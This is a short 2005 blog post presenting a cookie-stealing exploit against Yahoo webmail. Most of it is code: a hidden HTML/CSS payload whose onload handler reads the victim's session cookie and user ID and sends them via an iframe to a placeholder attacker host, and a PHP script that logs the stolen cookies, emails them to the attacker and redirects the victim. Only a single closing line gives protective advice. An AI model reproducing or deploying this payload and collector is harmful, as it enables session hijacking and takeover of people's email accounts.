Yahoo exploit: no password needed
Once again webmail services are facing security issues. This one aim the same target: connect without user’s password. This time yahoo is vulnerable.
Code:
<DIV id=b style="VISIBILITY: hidden"> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://your-site-here.com/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>';" type=text/css> </STYLE> </DIV>
script.php:
Code:
<? $file="cookie.log"; if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){ $logcookie = $_REQUEST["cookie"]; $logcookie = rawurldecode($logcookie); $logemail = $_REQUEST["id"]; $logemail = rawurldecode($logemail); if (file_exists($file)) { $handle=fopen($file, "r+"); $filecontence=fread($handle,filesize("$file")); fclose($handle); } $handle=fopen($file, "w"); fwrite($handle, "$logemail - $logcookie\n$filecontence\n "); //Writing email address and cookie then the rest of the log fclose($handle); mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"); } header("Location: [url=http://mail.yahoo.com/]http://mail.yahoo.com[/url]"); ?>
to protect from it make sure you hit the logout link instead of just closing the browser window. also this only works for internet explorer so use any other browser.
Filed under: Security - @ December 12, 2005 6:10 am